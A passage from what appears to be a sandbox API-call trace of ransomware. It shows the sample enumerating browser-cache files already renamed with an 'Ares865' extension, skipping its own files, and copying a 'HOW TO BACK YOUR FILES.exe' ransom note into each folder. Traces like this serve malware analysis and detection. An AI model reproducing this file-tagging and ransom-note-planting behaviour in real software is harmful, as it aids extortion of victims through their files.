returned 0 [0110.895] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458c8e50, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458c8e50, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a2bae80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBoqF0J[1].png.Ares865", cAlternateFileName="BBOQF0~1.ARE")) returned 1 [0110.895] lstrcmpiW (lpString1="BBoqF0J[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.895] lstrcmpiW (lpString1="BBoqF0J[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.895] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBoqF0J[1].png.Ares865" | out: lpString1="BBoqF0J[1].png.Ares865") returned="BBoqF0J[1].png.Ares865" [0110.895] lstrlenW (lpString="BBoqF0J[1].png.Ares865") returned 22 [0110.895] lstrlenW (lpString="Ares865") returned 7 [0110.895] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.895] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53063a30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53063a30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a2bae80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBzjV9E[1].png.Ares865", cAlternateFileName="BBZJV9~1.ARE")) returned 1 [0110.895] lstrcmpiW (lpString1="BBzjV9E[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.895] lstrcmpiW (lpString1="BBzjV9E[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.895] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBzjV9E[1].png.Ares865" | out: lpString1="BBzjV9E[1].png.Ares865") returned="BBzjV9E[1].png.Ares865" [0110.895] lstrlenW (lpString="BBzjV9E[1].png.Ares865") returned 22 [0110.895] lstrlenW (lpString="Ares865") returned 7 [0110.895] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.895] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60cdb940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x60cdb940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a2e0fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x200b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="benefits-1[1].jpg.Ares865", cAlternateFileName="BENEFI~1.ARE")) returned 1 [0110.896] lstrcmpiW (lpString1="benefits-1[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.896] lstrcmpiW (lpString1="benefits-1[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.896] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="benefits-1[1].jpg.Ares865" | out: lpString1="benefits-1[1].jpg.Ares865") returned="benefits-1[1].jpg.Ares865" [0110.896] lstrlenW (lpString="benefits-1[1].jpg.Ares865") returned 25 [0110.896] lstrlenW (lpString="Ares865") returned 7 [0110.896] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.896] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6157c900, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6157c900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a2e0fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x12590, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cb=gapi[1].loaded_1.Ares865", cAlternateFileName="CB_GAP~1.ARE")) returned 1 [0110.896] lstrcmpiW (lpString1="cb=gapi[1].loaded_1.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.896] lstrcmpiW (lpString1="cb=gapi[1].loaded_1.Ares865", lpString2="aoldtz.exe") returned 1 [0110.896] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="cb=gapi[1].loaded_1.Ares865" | out: lpString1="cb=gapi[1].loaded_1.Ares865") returned="cb=gapi[1].loaded_1.Ares865" [0110.896] lstrlenW (lpString="cb=gapi[1].loaded_1.Ares865") returned 27 [0110.896] lstrlenW (lpString="Ares865") returned 7 [0110.896] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.896] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50fa0830, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50fa0830, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a307140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x85e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chartbeat[1].js.Ares865", cAlternateFileName="CHARTB~1.ARE")) returned 1 [0110.896] lstrcmpiW (lpString1="chartbeat[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.896] lstrcmpiW (lpString1="chartbeat[1].js.Ares865", lpString2="aoldtz.exe") returned 1 [0110.896] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="chartbeat[1].js.Ares865" | out: lpString1="chartbeat[1].js.Ares865") returned="chartbeat[1].js.Ares865" [0110.896] lstrlenW (lpString="chartbeat[1].js.Ares865") returned 23 [0110.896] lstrlenW (lpString="Ares865") returned 7 [0110.896] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.897] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60c8f680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x60c8f680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a32d2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3c220, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chrome-installer.min[1].js.Ares865", cAlternateFileName="CHROME~1.ARE")) returned 1 [0110.897] lstrcmpiW (lpString1="chrome-installer.min[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.897] lstrcmpiW (lpString1="chrome-installer.min[1].js.Ares865", lpString2="aoldtz.exe") returned 1 [0110.897] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="chrome-installer.min[1].js.Ares865" | out: lpString1="chrome-installer.min[1].js.Ares865") returned="chrome-installer.min[1].js.Ares865" [0110.897] lstrlenW (lpString="chrome-installer.min[1].js.Ares865") returned 34 [0110.897] lstrlenW (lpString="Ares865") returned 7 [0110.897] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.897] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x60aec760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x60aec760, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a353400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1930, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chrome_logo_2x[1].png.Ares865", cAlternateFileName="CHROME~2.ARE")) returned 1 [0110.897] lstrcmpiW (lpString1="chrome_logo_2x[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.897] lstrcmpiW (lpString1="chrome_logo_2x[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.897] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="chrome_logo_2x[1].png.Ares865" | out: lpString1="chrome_logo_2x[1].png.Ares865") returned="chrome_logo_2x[1].png.Ares865" [0110.897] lstrlenW (lpString="chrome_logo_2x[1].png.Ares865") returned 29 [0110.897] lstrlenW (lpString="Ares865") returned 7 [0110.897] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.897] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x610b9d00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x610b9d00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a353400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="close-icon[1].png.Ares865", cAlternateFileName="CLOSE-~1.ARE")) returned 1 [0110.897] lstrcmpiW (lpString1="close-icon[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.897] lstrcmpiW (lpString1="close-icon[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.897] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="close-icon[1].png.Ares865" | out: lpString1="close-icon[1].png.Ares865") returned="close-icon[1].png.Ares865" [0110.897] lstrlenW (lpString="close-icon[1].png.Ares865") returned 25 [0110.897] lstrlenW (lpString="Ares865") returned 7 [0110.898] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.898] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54e4ae90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54e4ae90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a353400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x26cc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="css[1].txt.Ares865", cAlternateFileName="CSS_1_~1.ARE")) returned 1 [0110.898] lstrcmpiW (lpString1="css[1].txt.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.898] lstrcmpiW (lpString1="css[1].txt.Ares865", lpString2="aoldtz.exe") returned 1 [0110.898] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="css[1].txt.Ares865" | out: lpString1="css[1].txt.Ares865") returned="css[1].txt.Ares865" [0110.898] lstrlenW (lpString="css[1].txt.Ares865") returned 18 [0110.898] lstrlenW (lpString="Ares865") returned 7 [0110.898] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.898] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a379560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0110.898] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.898] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0110.898] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0110.898] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0110.898] lstrlenW (lpString="Ares865") returned 7 [0110.898] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.898] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf7af630, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf7af630, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a39f6c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4d8c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ebHtml5Banner[1].js.Ares865", cAlternateFileName="EBHTML~1.ARE")) returned 1 [0110.898] lstrcmpiW (lpString1="ebHtml5Banner[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.898] lstrcmpiW (lpString1="ebHtml5Banner[1].js.Ares865", lpString2="aoldtz.exe") returned 1 [0110.898] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="ebHtml5Banner[1].js.Ares865" | out: lpString1="ebHtml5Banner[1].js.Ares865") returned="ebHtml5Banner[1].js.Ares865" [0110.898] lstrlenW (lpString="ebHtml5Banner[1].js.Ares865") returned 27 [0110.898] lstrlenW (lpString="Ares865") returned 7 [0110.899] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.899] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64009240, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x64009240, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3c5820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eula-win[1].jpg.Ares865", cAlternateFileName="EULA-W~1.ARE")) returned 1 [0110.899] lstrcmpiW (lpString1="eula-win[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.899] lstrcmpiW (lpString1="eula-win[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.899] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="eula-win[1].jpg.Ares865" | out: lpString1="eula-win[1].jpg.Ares865") returned="eula-win[1].jpg.Ares865" [0110.899] lstrlenW (lpString="eula-win[1].jpg.Ares865") returned 23 [0110.899] lstrlenW (lpString="Ares865") returned 7 [0110.899] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.899] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe15e7f0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe15e7f0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a3c5820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1610, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].Ares865", cAlternateFileName="GETYPE~1.ARE")) returned 1 [0110.899] lstrcmpiW (lpString1="getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.899] lstrcmpiW (lpString1="getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1B;kvgrp=852361999;kvismob=2;extmirroring=0;kvtile=3;target=_blank;aduho=600;grp=852361999[1].Ares865", lpString2="aoldtz.exe") returned 1 [0110.899] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" [0110.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR" [0110.899] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.899] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\content.ie5\\ikqeepzr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.900] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.901] GetLastError () returned 0x0 [0110.901] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.901] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.901] CloseHandle (hObject=0x120) returned 1 [0110.901] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a8d46e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6a8d46e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.901] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.902] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.902] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="19619569[1].gif.Ares865" | out: lpString1="19619569[1].gif.Ares865") returned="19619569[1].gif.Ares865" [0110.902] lstrlenW (lpString="19619569[1].gif.Ares865") returned 23 [0110.902] lstrlenW (lpString="Ares865") returned 7 [0110.902] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.902] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54962130, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54962130, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a3eb980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x46500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7962161087[1].js.Ares865", cAlternateFileName="796216~1.ARE")) returned 1 [0110.902] lstrcmpiW (lpString1="7962161087[1].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.902] lstrcmpiW (lpString1="7962161087[1].js.Ares865", lpString2="aoldtz.exe") returned -1 [0110.902] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="7962161087[1].js.Ares865" | out: lpString1="7962161087[1].js.Ares865") returned="7962161087[1].js.Ares865" [0110.902] lstrlenW (lpString="7962161087[1].js.Ares865") returned 24 [0110.902] lstrlenW (lpString="Ares865") returned 7 [0110.902] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.902] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53017770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53017770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a411ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA3DGHW[1].png.Ares865", cAlternateFileName="AA3DGH~1.ARE")) returned 1 [0110.902] lstrcmpiW (lpString1="AA3DGHW[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.902] lstrcmpiW (lpString1="AA3DGHW[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.902] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA3DGHW[1].png.Ares865" | out: lpString1="AA3DGHW[1].png.Ares865") returned="AA3DGHW[1].png.Ares865" [0110.902] lstrlenW (lpString="AA3DGHW[1].png.Ares865") returned 22 [0110.902] lstrlenW (lpString="Ares865") returned 7 [0110.902] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.903] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x456d9c70, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x456d9c70, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a411ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA3e1pt[2].png.Ares865", cAlternateFileName="AA3E1P~1.ARE")) returned 1 [0110.903] lstrcmpiW (lpString1="AA3e1pt[2].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.903] lstrcmpiW (lpString1="AA3e1pt[2].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.903] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA3e1pt[2].png.Ares865" | out: lpString1="AA3e1pt[2].png.Ares865") returned="AA3e1pt[2].png.Ares865" [0110.903] lstrlenW (lpString="AA3e1pt[2].png.Ares865") returned 22 [0110.903] lstrlenW (lpString="Ares865") returned 7 [0110.903] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.903] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45856a30, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45856a30, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a437c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA42ckd[1].png.Ares865", cAlternateFileName="AA42CK~1.ARE")) returned 1 [0110.903] lstrcmpiW (lpString1="AA42ckd[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.903] lstrcmpiW (lpString1="AA42ckd[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.903] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA42ckd[1].png.Ares865" | out: lpString1="AA42ckd[1].png.Ares865") returned="AA42ckd[1].png.Ares865" [0110.903] lstrlenW (lpString="AA42ckd[1].png.Ares865") returned 22 [0110.903] lstrlenW (lpString="Ares865") returned 7 [0110.903] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.903] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45a1fab0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45a1fab0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a437c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA42eYr[1].png.Ares865", cAlternateFileName="AA42EY~1.ARE")) returned 1 [0110.903] lstrcmpiW (lpString1="AA42eYr[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.903] lstrcmpiW (lpString1="AA42eYr[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.903] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA42eYr[1].png.Ares865" | out: lpString1="AA42eYr[1].png.Ares865") returned="AA42eYr[1].png.Ares865" [0110.903] lstrlenW (lpString="AA42eYr[1].png.Ares865") returned 22 [0110.903] lstrlenW (lpString="Ares865") returned 7 [0110.903] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.904] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45bc29d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45bc29d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a437c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA61ILp[2].png.Ares865", cAlternateFileName="AA61IL~1.ARE")) returned 1 [0110.904] lstrcmpiW (lpString1="AA61ILp[2].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.904] lstrcmpiW (lpString1="AA61ILp[2].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.904] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA61ILp[2].png.Ares865" | out: lpString1="AA61ILp[2].png.Ares865") returned="AA61ILp[2].png.Ares865" [0110.904] lstrlenW (lpString="AA61ILp[2].png.Ares865") returned 22 [0110.904] lstrlenW (lpString="Ares865") returned 7 [0110.904] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.904] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50ebbff0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x50ebbff0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a45dda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 